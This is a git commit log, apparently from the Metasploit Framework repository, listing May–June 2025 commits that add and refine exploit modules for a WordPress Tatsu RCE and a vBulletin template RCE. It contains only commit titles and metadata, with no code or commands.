Dean Welch	32b978d768	Enable defer module loads by default	2025-06-12 10:59:54 +01:00
msutovsky-r7	2e3b66612b	Update modules/exploits/multi/http/wp_tatsu_rce.rb	2025-06-12 11:38:01 +02:00
msutovsky-r7	cb9f5e8743	Update modules/exploits/multi/http/wp_tatsu_rce.rb	2025-06-12 11:35:01 +02:00
Metasploit	7e88b53da1	Bump version of framework to 6.4.70	2025-06-12 04:04:12 -05:00
Martin Sutovsky	0b2e4bc337	Adds module for CVE-2021-25094	2025-06-11 19:03:00 +02:00
Chocapikk	33439fccb3	Add verbosity, update doc	2025-05-29 16:30:41 +02:00
Valentin Lobstein	f053d993f7	Update modules/exploits/multi/http/vbulletin_replace_ad_template_rce.rb Co-authored-by: Brendan <bwatters@rapid7.com>	2025-05-29 15:59:00 +02:00
Chocapikk	05d41232fe	Add CVE IDs	2025-05-27 13:51:49 +02:00
Chocapikk	6dc9809837	Non-blocking requests when trying to exploit, since the payload can be triggered twice	2025-05-26 20:17:39 +02:00
Chocapikk	854d2354fa	Fix check, both requests can display if the system is vulnerable	2025-05-26 20:04:19 +02:00
Chocapikk	387a39d0a9	Update doc, module	2025-05-25 20:13:36 +02:00
Chocapikk	6644bfa8dc	Check PHP version using X-Powered-By header	2025-05-24 00:10:52 +02:00
Chocapikk	64b9254b3d	Remove useless command in Dockefile	2025-05-23 23:59:06 +02:00
Valentin Lobstein	e6aa8a3125	Update documentation/modules/exploit/multi/http/vbulletin_replace_ad_template_rce.md Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>	2025-05-23 23:56:37 +02:00
Valentin Lobstein	df44d63ac3	Update documentation/modules/exploit/multi/http/vbulletin_replace_ad_template_rce.md Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>	2025-05-23 23:56:18 +02:00
Valentin Lobstein	f5e33ef290	Update documentation/modules/exploit/multi/http/vbulletin_replace_ad_template_rce.md Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>	2025-05-23 23:55:55 +02:00
Valentin Lobstein	69426e6dca	Update modules/exploits/multi/http/vbulletin_replace_ad_template_rce.rb Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>	2025-05-23 23:55:44 +02:00
Valentin Lobstein	1c717cf56b	Update modules/exploits/multi/http/vbulletin_replace_ad_template_rce.rb Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>	2025-05-23 23:55:34 +02:00
Chocapikk	ac98c1f554	Replace passthru with system	2025-05-23 23:34:44 +02:00
Chocapikk	1f6dd34f93	vBulletin replaceAdTemplate Remote Code Execution	2025-05-23 23:17:02 +02:00